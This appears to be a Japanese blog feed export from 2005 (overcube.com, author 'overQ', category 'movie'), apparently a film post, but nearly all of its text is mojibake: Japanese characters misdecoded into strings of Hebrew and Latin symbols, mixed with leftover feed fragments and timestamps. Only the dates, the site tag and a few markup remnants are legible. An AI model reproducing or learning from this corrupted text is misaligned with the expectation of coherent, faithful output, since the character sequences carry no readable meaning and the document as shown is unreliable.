¡ײֵ¾ל¡¢³°₪ֶַ¯₪¯¿ֽ₪־ֳ־·ֳ₪ַ₪¹₪ֽ¡׳ ¡ײ₪×₪¦¡£₪₪₪«₪ִ₪₪ּּ₪ַ°­₪ע´ף₪»₪ִ₪±₪ף¡£₪·₪«₪·¡¢¸«₪«₪±₪ֿµ´₪ַ₪ג¡¢¿´₪ֿ₪₪ָ₪±¡£ֹ¦ִ¹ֲ²₪ֻ°­₪₪₪ה₪ִ₪ֿ₪×₪י₪ף¡׳... - - overQ - - - - - - ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    - -

    ְ¾¿״³¦·¨₪עג₪¯₪ָ¡¢ִ®²°₪־²°÷¬₪־¾ו₪ֻ₪ֿ¡¢₪³₪־₪ט₪¦₪ֻ¾®₪µ₪¿ְֽֽ₪¬₪₪₪ֶ¡¢²ָ₪ע¼י₪ֳ₪ֶ₪₪₪₪¹¡£

    - -

    ¾בסִ¡₪·₪ח₪¦₪­¡ֻ₪µ₪

    - -

    ₪ָ₪₪₪¦₪½₪¦₪ַ₪¹¡£°ל²ָ₪ֻ₪ׂ₪ָ₪ך₪־¼י₪ך¿ְ¡£ִ¹₪₪₪×ֹ¦₪¬¥ָ¥ל¡¼¥ֹ¥¡¼¥¯¡£
    -°ל¸®°ל¸®₪ַ₪½₪ל₪¾₪ל₪־¾בסִ₪µ₪¡ָשּ¯₪ֻ»ׁ₪«₪¿₪ֱ₪¬₪ֱ₪¬₪¦¡ֻ¡£

    - -

    ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    - -

    ¡ײ´¨₪₪₪־₪ֻ₪¿₪₪₪״₪ף₪ַ₪¹₪ֽ¡׳
    -¡ײ₪×₪¦¡£ֹ¦₪¬ִ¹₪₪₪־₪ַ₪¢₪¿₪¿₪«₪¸₪ד¡£¥½¥ך₪ֻ¾ט₪ֳ₪¿ֶמָ₪־ְײ₪₪¥ה¥ִ₪ג¡¢₪ן₪·₪ע¿¿»ק₪ֶ¿­₪׀₪·₪ֶ₪×₪כ₪¸₪ד₪ם₪¦¡׳
    -¡ײֵ¾ל¡¢³°₪ֶַ¯₪¯¿ֽ₪־ֳ־·ֳ₪ַ₪¹₪ֽ¡׳
    -¡ײ₪×₪¦¡£₪₪₪«₪ִ₪₪ּּ₪ַ°­₪ע´ף₪»₪ִ₪±₪ף¡£₪·₪«₪·¡¢¸«₪«₪±₪ֿµ´₪ַ₪ג¡¢¿´₪ֿ₪₪ָ₪±¡£ֹ¦ִ¹ֲ²₪ֻ°­₪₪₪ה₪ִ₪ֿ₪×₪י₪ף¡׳

    ]]> - ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    - -

    ³°₪ֻ₪ֿ¡ײ¾בסִ₪µ₪¡׳¡¢²ָ₪־ֶגֲ¦₪ֻ₪ֿ¡¢²¼₪־₪´₪ָ₪¯¡¢¸מֹה₪¬ֵ½₪י₪ל₪ֶ₪₪₪₪¹¡£
    -₪·₪«₪ג¡¢¿°ֲ¿ְµ₪ָ¸ז־מ¿ְ¼ׂ₪־¥ְ¥ײ¥כֹֹֻ¡£
    -₪₪₪ן₪׀¡¢¥ױ¥¡¥₪¥¢¡¼¥¦¥©¡¼¥כ₪ָ¡¢¥¢¥ף¥ֱ¥¦¥£¥כ¥¹¥½¥ױ¥ָ₪ָ¡¢¥¹¥ׁ¥₪¥¦¥§¥¢ֲ׀÷צ₪ע₪₪ֹ₪³₪·₪¿₪«₪־₪ט₪¦¡£

    - -

    ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    - -

    ִ®²°₪ֿ₪½₪ל₪ַ₪ט₪·¡£
    -»(¥µ¡¼¥׀)₪ע¼י₪כ₪־₪ֿ¡¢¿־²¦₪¸₪ד¡£

    - -

    ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢₪ה₪כµ₪ֻ‏¡¹₪־¿־²¦₪ֿ¡¢₪³₪־ּװ־ץ₪´¨ַָ₪־ֳז¡¢₪״₪½½׀₪·¥כ¥ֳ¥¯₪ַ´טִ¥₪ֳ₪ֶ₪₪¹¡£

    - -

    ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    - -

    ¥¯¥י¥₪¥¢¥ף¥ָ₪־³§₪µ₪ף₪¬¿´ַ₪·₪ֶ¡¢₪ן₪י₪¸₪עװ₪ף₪ְ₪ְ₪ט¡£
    -¿־²¦₪µ₪ף¡¢₪´¶לֿ«₪µ₪¡£ֹק¼¡¢₪×¾₪₪·₪ֻ₪₪י₪ל₪₪¹₪¡£

    - -

    °¾ן₪ֻ´¨₪₪ֶ¡¹₪¬₪ִ₪ֵ₪₪₪ֶ₪×₪ך₪₪¹¡£³§ֽֽ₪ג₪´¼«°¦₪₪µ₪ל₪₪¹₪³₪ָ₪ע¡£

    - -

    ²°÷¬₪־¾ו₪־¿ְֽֽ£´

    ]]> -
    -
    - - ¥ב¥ָ¥ם¥ףְ±¿ֽ₪־±¢±ֶ־י»¾ - - 2005-12-15T13:11:51Z - 2005-12-15T22:11:51+09:00 - tag:www.overcube.com,2005:/blog//2.673 - 2005-12-15T13:11:51Z - ¡ת¥ב¥ָ¥ם¥ףְ±¿ֽ₪־₪×₪₪ה₪² ְט½µ₪־¥¦¥כ¥ָ¥י¥¥ף¡¦¥¥ֳ¥¯¥¹¡£¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡£ ₪₪«₪₪«¹¥ֹ¾₪ְ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡£»כִ°־¨₪ג₪ט₪«₪ֳ₪¿₪ף₪¸₪ד₪₪₪₪ַ₪·₪ח₪¦₪«¡£¥ֽ¥ֳ¥ָ¾ו₪ַ₪ג₪¿₪¯₪µ₪ףַּּע₪₪´¶ֱ₪¬½׀₪ֶ₪₪₪₪¹¡£ ¡¢×ָ‏ֻֻ₪µ₪ף₪¬₪³₪־ָײֱָ₪ֻ₪²₪ֶ₪×₪י₪ל₪כ¡¢₪¹₪´₪₪ֳ»²־₪ֿ₪³₪ֱ₪י¡ֻ ¥ב¥ָ¥ם¥ףְ±¿ֽ₪¬ֳֿµו₪ֻ¸«ְ₪ך₪ע₪ִ₪±₪ֶ¸־¶¿₪ֻµ¢₪כ¡¢₪ָ₪₪₪¦₪×ֳֿ¡£ ₪ְ₪ֳ₪ֶ₪ג₪¦¡¢ֳֿµו₪ֿ¿¯־¬₪¹₪כ₪ֳֻֽ₪·₪₪₪ְ±₪ֻ¡¢₪₪ֳ₪ֶ₪·₪₪ֳ₪¿₪«₪י¡£ ₪ַ¡¢¥ב¥ָ¥ם¥ף₪µ₪ף₪¬¸־¶¿₪ֻ»‎₪ֱµ¢₪כ₪×₪₪ה₪²₪ֿ¡¢ ¡¦¥ָ¥₪¥ל₪¬µֽ₪₪ֳ₪¿»‏¡¢¥ׁ¥³¥ׁ¥³₪ה₪כֶ»¶ס¡ּ¾ֱ°₪¬₪ן₪«₪י₪ף¡ֻ¢×₪³₪ל ¡¦±ֳ«±א₪־₪×ֳדִׂ₪±¡ֱ‎־ּ¥µ¡¼¥׃¥¹¥ׁ¥ֳ¥¯₪«¡£¡ֻ¢×³ֲָח¿ ¡¦¥ב¥ָ¥ם¥ףְ±¿ֽ₪־¥½¥ױ¥׃¡₪ֱ₪ד₪ײֲז₪ִ₪­¡ֻ¢×₪³₪ל ¡¦ֽ¼¾ֶ₪±¡£ ₪₪ֹ₪₪ֹ¡£ ₪₪ף₪ֶ¾¼ֲֿ₪₪×₪₪ה₪²₪ַ₪»₪¦¡£ ֽ¼¾ֶ₪±₪עִ¯₪ב₪ֶ¡¢¥ב¥ָ¥ם¥ף₪µ₪ף₪ֿ¡¢ ¡ײֳֿµו₪־ֽ¼¾ֶ₪±₪ָֿ‏₪·₪₪₪₪¢¡£ ₪ָ₪ך₪ן₪±ֶֻ₪־²«÷×₪ֿ¡£ ¡ִ₪³₪־±¢ז־י»¾₪¬₪₪ֻ₪ט₪ך₪־₪₪ה₪²₪ְ₪¡׳ ¥¦¥כ¥ָ¥י¥¥ף¡¦¥¥ֳ¥¯¥¹₪ֻּµָֹֻק₪ֻ₪גַ״₪ע¸‏₪±¡¢¹ר₪־₪¢₪¿₪ך₪ַ¸ו₪ם¼ך₪ֱָֻ₪₪₪¬₪י¡¢¥ב¥ָ¥ם¥ף₪µ₪ף¡¢ֶָ₪ך¸ְ₪־₪ט₪¦₪ֻ₪·₪₪¸₪₪ָ₪ִ₪ײ₪ה₪¯¡£ ֵֻֽ₪־ִ«₪־»ׂ₪ֹ₪ג¸‏₪±ָײֱָ₪ַ¡¢±¢ז־י»¾¹¶·ג₪ֿ¶¯־ץ₪¹₪®¡£ִ«£·»‏£µ£µ¬₪ֻ¡¢₪¹₪ַ₪ֻ»׳₪₪₪ֳ₪­₪ך₪¿₪½₪¬₪ל₪ֱ₪ד₪ֳ₪ֶ₪₪₪₪¹¡£ ¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹₪ג¼ך½׀₪·₪ַ₪­₪₪»₪ף¡£¥ֶ¥ל¥׃₪־ֱ°₪־₪ט₪₪»ׂ₪־₪₪ף₪₪ג¥¥ֽ₪ַ₪­₪₪₪¡£ ֽ¼¾ֶ₪±¾®¾ֶ₪±₪ֶַ₪¬כ₪ל₪ֶ¡¢¿ְ®₪־ֳז¡¢¾ֳ₪¨₪ז₪¯¾¼ֲֿ₪₪־₪ַ₪¹¡£ ¡תּ₪ֽט₪ֻ₪₪ֳ₪ֶ₪₪ֶ ¡ײְֱ₪ן₪ל₪₪₪³¹¡׳₪ֿ¡¢¾¼ֲֿ£´£·ַ¯ֱק₪־¥¦¥כ¥ָ¥י¥»¥ײ¥ף¡ײְֱ₪ן₪ל₪¿³¹¡׳₪־ֲ³װ¡£ ¶ג¾כֵ¯ֹ׳₪־µ׃ֻ₪ֻ₪ט₪כ£³£¸ַ¯ֱ°₪־÷מֹ₪ֿ¡¢₪³₪¦ִש₪ב₪¯₪¯₪י₪ל₪ֶ₪₪₪₪·₪¿¡£ ¥ב¥ָ¥ם¥ףְ±¿ֽ₪־ֳֿµו¿¯־¬·׳²ט₪ֿ₪³₪¦₪·₪ֶ½×₪ן₪ֳ₪¿₪־₪ַ₪¹¡£ ¿ֽ´ײֶ±»־₪־¿®ֽך´¶₪עֽרֽׁ₪¹₪כ₪ָ₪ֿ¶²₪כ₪₪­±§ֳט¿ֽ₪ַ₪¹¡£ ₪ַ₪ג₪´°ֲ¿´²¼₪µ₪₪¡¢₪³₪־₪×ֳֿ₪ֿ±ף₪₪±ף₪₪ּ₪ֽט₪־׸ל₪₪־₪ַ₪¹¡ִ¡£ ₪¨¡¢²¿¸־₪ַ₪¹₪ֳ₪ֶ¡© ¡ִ²ז¡¹¿ֽ־א₪ֿ÷£¡¢±§ֳט¿ֽ₪ְֱֻ₪ן₪ל₪כ₪₪ֹ¡¢₪׸₪₪₪ע¿®ֽך₪·₪ֶ₪ֿ₪₪₪₪»₪ף₪«₪י¡ִ ₪³₪־₪¢₪ָ₪ע¼ץ₪±₪ֶ₪־¡¢±ף₪₪±ף₪₪ּ₪ֽט¡¢¿ְ®£±£·ַ¯¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡£... - - overQ - - - - movie - - ¡ת¥ב¥ָ¥ם¥ףְ±¿ֽ₪־₪×₪₪ה₪²

    - -

    ְט½µ₪־¥¦¥כ¥ָ¥י¥¥ף¡¦¥¥ֳ¥¯¥¹¡£¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡£
    -₪₪«₪₪«¹¥ֹ¾₪ְ₪ֳ₪¿₪ט₪¦₪ַ₪¹¡£»כִ°־¨₪ג₪ט₪«₪ֳ₪¿₪ף₪¸₪ד₪₪₪₪ַ₪·₪ח₪¦₪«¡£¥ֽ¥ֳ¥ָ¾ו₪ַ₪ג₪¿₪¯₪µ₪ףַּּע₪₪´¶ֱ₪¬½׀₪ֶ₪₪₪₪¹¡£
    -¡¢×ָ‏ֻֻ₪µ₪ף₪¬₪³₪־ָײֱָ₪ֻ₪²₪ֶ₪×₪י₪ל₪כ¡¢₪¹₪´₪₪ֳ»²־₪ֿ₪³₪ֱ₪י¡ֻ

    - -

    ¥ב¥ָ¥ם¥ףְ±¿ֽ₪¬ֳֿµו₪ֻ¸«ְ₪ך₪ע₪ִ₪±₪ֶ¸־¶¿₪ֻµ¢₪כ¡¢₪ָ₪₪₪¦₪×ֳֿ¡£
    -₪ְ₪ֳ₪ֶ₪ג₪¦¡¢ֳֿµו₪ֿ¿¯־¬₪¹₪כ₪ֳֻֽ₪·₪₪₪ְ±₪ֻ¡¢₪₪ֳ₪ֶ₪·₪₪ֳ₪¿₪«₪י¡£

    - -

    ₪×ֳדִׂ₪±₪ַ¡¢¥ב¥ָ¥ם¥ף₪µ₪ף₪¬¸־¶¿₪ֻ»‎₪ֱµ¢₪כ₪×₪₪ה₪²₪ֿ¡¢

    - -

    ¡¦¥ָ¥₪¥ל₪¬µֽ₪₪ֳ₪¿»‏¡¢¥ׁ¥³¥ׁ¥³₪ה₪כֶ»¶ס¡ּ¾ֱ°₪¬₪ן₪«₪י₪ף¡ֻ¢×₪³₪ל
    -¡¦±ֳ«±א₪־₪×ֳדִׂ₪±¡ֱ‎־ּ¥µ¡¼¥׃¥¹¥ׁ¥ֳ¥¯₪«¡£¡ֻ¢×³ֲָח¿
    -¡¦¥ב¥ָ¥ם¥ףְ±¿ֽ₪־¥½¥ױ¥׃¡₪ֱ₪ד₪ײֲז₪ִ₪­¡ֻ¢×₪³₪ל
    -¡¦ֽ¼¾ֶ₪±¡£

    - -

    ₪₪ֹ₪₪ֹ¡£
    -₪₪ף₪ֶ¾¼ֲֿ₪₪×₪₪ה₪²₪ַ₪»₪¦¡£

    - -

    ±¢±ֶ־י»¾₪¹₪כ¥ב¥ָ¥ם¥ףְ±¿ֽֽ¼¾ֶ₪±₪עִ¯₪ב₪ֶ¡¢¥ב¥ָ¥ם¥ף₪µ₪ף₪ֿ¡¢
    -¡ײֳֿµו₪־ֽ¼¾ֶ₪±₪ָֿ‏₪·₪₪₪₪¢¡£
    -₪ָ₪ך₪ן₪±ֶֻ₪־²«÷×₪ֿ¡£
    -¡ִ₪³₪־±¢ז־י»¾₪¬₪₪ֻ₪ט₪ך₪־₪₪ה₪²₪ְ₪¡׳
    -¥¦¥כ¥ָ¥י¥¥ף¡¦¥¥ֳ¥¯¥¹₪ֻּµָֹֻק₪ֻ₪גַ״₪ע¸‏₪±¡¢¹ר₪־₪¢₪¿₪ך₪ַ¸ו₪ם¼ך₪ֱָֻ₪₪₪¬₪י¡¢¥ב¥ָ¥ם¥ף₪µ₪ף¡¢ֶָ₪ך¸ְ₪־₪ט₪¦₪ֻ₪·₪₪¸₪₪ָ₪ִ₪ײ₪ה₪¯¡£

    - -

    ֵֻֽ₪־ִ«₪־»ׂ₪ֹ₪ג¸‏₪±ָײֱָ₪ַ¡¢±¢ז־י»¾¹¶·ג₪ֿ¶¯־ץ₪¹₪®¡£ִ«£·»‏£µ£µ¬₪ֻ¡¢₪¹₪ַ₪ֻ»׳₪₪₪ֳ₪­₪ך₪¿₪½₪¬₪ל₪ֱ₪ד₪ֳ₪ֶ₪₪₪₪¹¡£
    -¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹₪ג¼ך½׀₪·₪ַ₪­₪₪»₪ף¡£¥ֶ¥ל¥׃₪־ֱ°₪־₪ט₪₪»ׂ₪־₪₪ף₪₪ג¥¥ֽ₪ַ₪­₪₪₪¡£

    - -

    ֽ¼¾ֶ₪±¾®¾ֶ₪±₪ֶַ₪¬כ₪ל₪ֶ¡¢¿ְ®₪־ֳז¡¢¾ֳ₪¨₪ז₪¯¾¼ֲֿ₪₪־₪ַ₪¹¡£

    - -


    -¡תּ₪ֽט₪ֻ₪₪ֳ₪ֶ₪₪ֶ

    - -

    ¡ײְֱ₪ן₪ל₪₪₪³¹¡׳₪ֿ¡¢¾¼ֲֿ£´£·ַ¯ֱק₪־¥¦¥כ¥ָ¥י¥»¥ײ¥ף¡ײְֱ₪ן₪ל₪¿³¹¡׳₪־ֲ³װ¡£
    -¶ג¾כֵ¯ֹ׳₪־µ׃ֻ₪ֻ₪ט₪כ£³£¸ַ¯ֱ°₪־÷מֹ₪ֿ¡¢₪³₪¦ִש₪ב₪¯₪¯₪י₪ל₪ֶ₪₪₪₪·₪¿¡£
    -

    ¥ב¥ָ¥ם¥ףְ±¿ֽ₪־ֳֿµו¿¯־¬·׳²ט₪ֿ₪³₪¦₪·₪ֶ½×₪ן₪ֳ₪¿₪־₪ַ₪¹¡£
    -¿ֽ´ײֶ±»־₪־¿®ֽך´¶₪עֽרֽׁ₪¹₪כ₪ָ₪ֿ¶²₪כ₪₪­±§ֳט¿ֽ₪ַ₪¹¡£
    -₪ַ₪ג₪´°ֲ¿´²¼₪µ₪₪¡¢₪³₪־₪×ֳֿ₪ֿ±ף₪₪±ף₪₪ּ₪ֽט₪־׸ל₪₪־₪ַ₪¹¡ִ¡£
    -₪¨¡¢²¿¸־₪ַ₪¹₪ֳ₪ֶ¡©
    -¡ִ²ז¡¹¿ֽ־א₪ֿ÷£¡¢±§ֳט¿ֽ₪ְֱֻ₪ן₪ל₪כ₪₪ֹ¡¢₪׸₪₪₪ע¿®ֽך₪·₪ֶ₪ֿ₪₪₪₪»₪ף₪«₪י¡ִ

    - -

    ₪³₪־₪¢₪ָ₪ע¼ץ₪±₪ֶ₪־¡¢±ף₪₪±ף₪₪ּ₪ֽט¡¢¿ְ®£±£·ַ¯¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡£
    -

    ]]> - ¿ֽ־א₪ֿ₪ה₪ֳ₪ׁ₪ך¡ײ₪׸₪₪₪־¿®ֽך¡׳₪עְ¸₪½׀₪»₪÷¡¢₪ג₪¦₪ֳ₪ֶ₪×₪₪₪ֶ₪ג¡¢¾¡¼ך₪ַֻּ₪׃₪ֶ₪₪₪¯ֲ¸÷₪ֻ₪₪ַ¡¢ֲא²½₪·₪ֶ₪₪₪כ¡£
    -¾¼ֲֿ₪ֻ₪×₪₪₪ֶ₪₪י¡ײ±ף₪₪ּ₪ֽט₪־´ץֻ¾¡׳₪ָ₪·₪ֶ¸ל₪ך₪¨₪¿₪ג₪־₪ג¡¢¿ְ®₪־÷£₪ַ₪ּֿ₪ֽט±¹ו₪ֳֻ£ְ®₪µ₪ל₪₪₪₪ג₪־₪ֻ»׳₪ן₪ל₪כ¡£(₪·₪«₪·¡¢₪³₪־¼חֲך₪ֿ¼ֱֲך»¾¼ֽ÷´ִֶֶ₪¬₪¯₪ךײ₪·ֱֹ₪₪₪ֶ₪­₪¿₪ג₪־¡£¾¼ֲֿ£´£°ַ¯ֲו₪ֻ₪ֿ₪¹₪ַ₪ֻ¡¢¡ײ¸ֵ₪­₪ט₪­₪ג₪־₪¬ַּ₪ף₪ַ₪₪₪¯¡׳₪ָ₪₪₪¦±ַ²ט₪ע÷מ₪ֳ₪ֶ₪₪₪כ₪־₪ְ₪ֳ₪¿£ק)
    -ִ¹₪₪´ײ¡¢ִ®₪ְֻרֹת₪·₪ֶ¸«¼י₪ֳ₪ֶ₪­₪¿¥ב¥ָ¥ם¥ףְ±¿ֽ₪ג¡¢₪ִ₪₪₪ֻ¸«ְ₪ך₪ע₪ִ₪±₪כ₪ָ₪­₪¬ֽט₪₪·₪¿¡£

    - -

    ₪ָ₪ֶ₪ג¥ײ¥י¥ֳ¥¯₪ַ¥·¥ֻ¥«¥כ¡¢₪₪¿₪µ₪׃₪·₪₪µ₪»‎₪ֱ₪ֻ₪µ₪»₪כ₪×ֳֿ¡£₪ג₪¦₪ֱ₪ח₪ֳ₪ְָׁ¶ֵֻ×₪¥ב¥ֳ¥»¡¼¥¸₪ג₪₪·₪₪µ₪₪ג₪¹₪כ¡£
    -₪¿₪·₪«₪ֻ¡¢¥ב¥ָ¥ם¥ף₪µ₪ף₪־¸ְֶ°₪עֳז¿´₪ֻ¸«₪¿¾ל¹ח¡¢₪½₪ף₪´¶₪¸₪ֿ₪¹₪כ₪־₪ַ₪¹¡£

    - -

    ¾¼ֲֿ¥×¥ה¥¸₪¿₪ְ¡¢₪³₪־÷מֹ₪־¼ח¿ֽ¸ר₪ֿ¡¢ֿ»¿ִ¾ְ¯±י₪¸₪כ₪ָ₪³₪ם₪־·÷»צ¡£¡½ֲ₪₪₪ַ₪¹¡£ַ»₪₪₪ַ₪¹¡£₪ֹ¥¢¥ֳ¥׳₪ַ₪¹¡£ִ«₪־ָײֱָ₪ָ₪ֿ»׳₪¨₪₪»₪ף¡£¡ֻ
    -¥״¥׃¡¼¥¹¥ג¡¼¥«¡¼₪ַ¡¢₪₪₪₪ְ₪ֻ·ֲָ׃ֳֵֵֿ₪ג»‎₪¿₪₪₪¡¢¾¼ֲֿ₪־₪₪₪־ֳזַ¯ֳֻ¡£(₪½₪·₪ֶ¡¢¥ב¥ָ¥ם¥ףְ±¿ֽ₪ֿ»ְִֵַ¡£ֶֻגְµָ‏₪ֿ£ֹ£׃£ׂ£ֹ¡¡×¡ֻ₪־¸¦µז¼װ₪ַ¡¢´ִֵ¿¹₪ע׳ַ׳¡£¥ל¥®¥ו¥י¡¼ּµ»כ₪־¡¢₪¹₪´₪₪ַּע¡£)
    -±§ֳט¿ֽ₪ט₪ך₪ג₪ג₪ֳ₪ָֹ₪₪₪ג₪־¡¡ב¿ֽ´ײ¡ֻ₪עֳ־₪ֳ₪ֶ₪₪₪כֳֻ¡£
    -ָא₪¬¿ְ®₪עְ¸₪­±ה₪׃₪כ׸ל₪ַ₪ג₪¢₪כ¡£

    - -


    -¡ת¿ְ®₪־ֳז₪־¾¼ֲֿ

    - -

    ּפ₪ֿ÷‏ּ׃₪ֵַֹ₪כ·÷»צ₪ֿ₪¸₪ִ₪ֿ¾¯ַ¯₪־÷¢¡¢¥ב¥ָ¥ם¥ףְ±¿ֽ₪עֳ־₪ֳ₪ֶ₪₪₪¿¡£
    -¥»¥ײ¥ף₪־¥¢¥₪¥¹¥י¥ֳ¥¬¡¼₪ַ¿¿₪ֳֶף₪ִ₪ֻ₪µ₪ל₪¿¥ב¥ָ¥ם¥ף₪ע¡¢¾¯ַ¯₪־÷¢¡¢ָא₪ָָא₪־ֱִֹד¡¡©¡ֻ₪¬₪«₪¯₪₪₪¡¢¼£־ֵ₪·₪ֶ₪ה₪ֳ₪¿₪«₪י¡£
    -₪¢₪־»‏ֲו¡¢₪¢₪־¾ל½ך₪ֻ₪ֿ¡¢¡ײ₪׸₪₪₪־¿®ֽך¡׳₪¬₪¢₪ֳ₪¿¡£ַ׃½₪µ₪לַװֻּ₪·₪¿¿¯־¬¼װ₪ָ₪־´ײ₪ֻ₪µ₪¨¡£

    - -

    ₪½₪־»׳₪₪½׀₪ע¶»₪ֻ±£₪·»‎₪ֳ₪ֶ¡¢¿ְ®₪עְ¸₪­₪כ·÷»צ¡£ֿ»¿ִ¾ְ¯₪־¥×¥ה¥¸₪ֶשֲ־₪־ֳז₪ֻ₪ֿ¡¢¾¼ֲֿ¾¯ַ¯₪¬ֲ©₪ֵ₪₪₪ֶ₪₪₪כ¡£

    - -

    ¿ְ®₪־÷£¡£
    -°­₪₪₪ה₪ִ₪ע¸«₪ִ₪±₪ל₪׀ַ׃½₪¹₪כ¡£ֹװ¾ֽ»צ₪¬₪¢₪ל₪׀ְױַ₪¼װ₪ע¸«₪ִ₪±½טָ³₪¹₪כ¡£
    -₪ָ₪³₪ם₪¬¡¢¼י₪כ₪₪­₪ג₪־₪ע¹ג₪₪½₪ַ¼ט₪ך°ֿ₪¡¢¥»¡¼¥ױ¥ֶ¥£¡¦¥¾¡¼¥ף₪ע÷מ₪ֳ₪¿₪ִ₪ג₪ך₪ְ₪־₪ֻ¡¢°­₪ֿ₪₪₪ִ₪גֶגֹפ₪«₪יָ¯ְ¸₪¹₪כ¡£
    -₪ֹ₪¦₪·₪¿₪³₪ָ₪ְ¡£
    -¡ִ₪ג₪ֳ₪ָ₪ג¶²₪ם₪·₪₪₪־₪ֿ¡¢¿ֽ´ײ₪ְ₪«₪י¡£(»ׂ₪ֹ₪ג₪ע»¦₪¹ׁ¼ֱ¼װ₪עַ׃½₪·₪¿₪ֿ₪÷₪¬¡¢÷£ֵ₪ֿ¿ֶ₪הְטְ¸₪«₪י»ׂ₪ֹ₪ג₪ע»¦₪¹₪ג₪־₪¬¸½₪ן₪ל₪כ¡£¿®ֽך₪ַ₪­₪כֲח¿ֽ₪ע½¸₪ב₪¿₪ִ₪ג₪ך₪¬¡¢₪½₪־ֳז₪«₪יָָ÷ב¼װ₪¬ְ¸₪₪ל₪כ¡£»ׂ₪ֹ₪ג₪ְ₪±₪ֻ₪·₪ֶ₪₪ל₪׀¡¢÷£ֵ₪ֿ»ׂ¶¡ֶ±»־₪ַ»¦₪·₪¢₪¦»ֻֿצ¡£ָָֹֻ¥¥כ¡¢»שֶ¸ֱךֳּ½ך¸¢־ֿ¶¯²½¡¢´ֶ»כ¥«¥ב¥י¡¢±ְׂ±´ֶ»כ¥·¥¹¥ֶ¥א¡¢¸·₪·₪₪½טָ³¡¢ֹנ´ן½ך»‎¡ִ¡£₪·₪«₪·¡¢½₪ע¹ג₪¯₪¹₪ל₪׀₪¹₪כ₪₪ֹ¡¢°­₪ֿ½ד¿ט₪ֻ₪₪ֳ₪ֶ₪₪₪¯¡£₪³₪ל₪¬¥ב¥ָ¥ם¥ף₪־¸ְ₪¦¡¢¥ִ¡¼¥כ₪ֻ₪ט₪כֲא²½₪₪־₪«¡£)

    - -

    ´ץֻ¾₪־¸«½׀₪»₪₪₪ְ₪³¦₪ַ¡¢·÷»צ₪ֿ¡ײְ¸₪­₪ם¡×¡׳₪₪ֹ₪ָ¶«₪׃₪ֿ₪·₪₪₪¡£
    -µמ₪ֳ₪ֶ₪₪₪ֳ₪¿¥ב¥ָ¥ם¥ף₪ֻ»׳₪₪₪ע₪ֿ₪»¡¢
    -¡ײ₪ג₪·₪ַ₪­₪כ₪³₪ָ₪₪י¡¢¥×¥ל₪גֿ¢₪ל₪ֶ₪ֳ₪ֶֽ₪·₪«₪ֳ₪¿₪¡׳
    -₪ָ₪ױ₪ָ₪ִ₪ײ₪ה₪­₪ג₪¹₪כ¡£₪·₪«₪·¡¢·÷»צ₪ְֿ¸₪­₪ֶ₪₪₪¯¡ִ¿´₪ֿ¥ב¥ָ¥ם¥ף₪ָֽ¼כ₪־ֳז₪ֻ₪¢₪כ₪±₪ל₪ֹ¡£
    -¡ײ₪¸₪ד₪¢₪¡£»צ·ן₪¬»³₪₪ֲֹװ₪ֳ₪ֶ₪כ₪ף₪ַ₪ֽ¡ִ±§ֳט¿ֽ₪ט₪ך₪ג₪ה₪ֳ₪«₪₪₪¡׳
    -₪½₪¦¥«¥₪¥ֲָג°ק¡ְִ»³ֱנְֲ¡ֻ₪ֻ¼־₪ֲֶז»ל₪ע»ִ₪·₪ֶ¡£

    - -

    ₪½₪ל₪ֲֻ׀₪·₪ֶ¡¢¥«¥₪¥ָ¡ב¥¦¥כ¥ָ¥י¥¥ף¥¥ֳ¥¯¥¹¡¢
    -¡ײ₪¢₪־¿ֽ₪־¸ְ₪¦₪ָ₪×₪ך₪ְ¡£₪ה₪ִ₪ֿ¡¢₪³₪־ְ±₪ֻ¸«ְ₪ך₪ע₪ִ₪±₪ֶ¡¢¸־¶¿₪־ְ±₪ֻµ¢₪ֳ₪ֶ₪₪₪ֳ₪¿₪ף₪ְ¡׳
    -¡ײ₪ַ₪ג¡ִ¡׳₪ָָ¿ְֿ₪־¸ְֽױ₪עֳµ₪·₪¢₪°₪ֽ₪כ¥¥÷¥­ֲג°ק¡ִ¹ֳ«ֹפֶ·¡ֻ₪־¸ְֽױ₪ַ¡¢ֵגֶֽ₪ֻ׸ל₪ֳַֿ₪ְֱ₪י₪ל₪₪¹¡£¡ײ₪ַ₪ג¡׳₪־₪¢₪ָ¡¢₪₪ף₪ֲָ³₪±₪ל₪׀₪₪₪₪₪־₪ְ₪ם₪¦¡ִ¥ױ¥£¥כ¥א₪ֵֿ׃ְ₪ל₪ֶ₪·₪₪¦₪־₪ַ₪·₪¿¡£¡£

    - -


    -¡ת¾¼ֲֿ₪ָ¿ְ®

    - -

    ¥¦¥כ¥ָ¥י¥»¥ײ¥ף₪־¥ב¥ָ¥ם¥ףֵ׀¾ל¥¥ֳ¥¯¥¹₪־¥ב¥ָ¥ם¥ףֵ׀¾ל

    - -

    ¡ײְֱ₪ן₪ל₪¿³¹¡׳₪ָ¡ײְֱ₪ן₪ל₪₪₪³¹¡׳¡£
    -₪ֹ₪ֱ₪י₪ג¥ב¥ָ¥ם¥ףְ±¿ֽ₪־ֵ׀¾ל₪ֿ¡¢ְמ₪ֻ₪µ₪«₪µ₪₪ֻ±ַ₪ֳ₪¿»ׁ¡£¡÷¸¥»¥ײ¥ף¡¢±¦¥¥ֳ¥¯¥¹¡ֻ
    -₪ַ₪ג¡¢ְמ₪¬₪­₪ל₪₪₪ֻ₪₪ֳ₪ֶ₪₪₪כ¡£

    - -

    ³¹₪«₪י¹©¾ל₪¬₪₪¯₪₪ֳ₪¿₪»₪₪₪ְ¡£
    -₪½₪ל₪¬¾¼ֲֿ₪ָ¿ְ®₪־°ד₪₪¡£

    - -

    ¾¼ֲֿ₪־ֹק·¡£
    -ֽ¼כ₪ל₪־ֵ¼ך₪־ֶ»¡£₪ײ½₪±±לֶֽ₪־¸‏₪³₪¦₪ֻ₪ֿ¡¢₪¢₪«₪ֽ¿§₪־¶ץ¡£
    -²ֿ¸¶₪ַּמµו₪ע₪¹₪כ¾¯ַ¯¡£
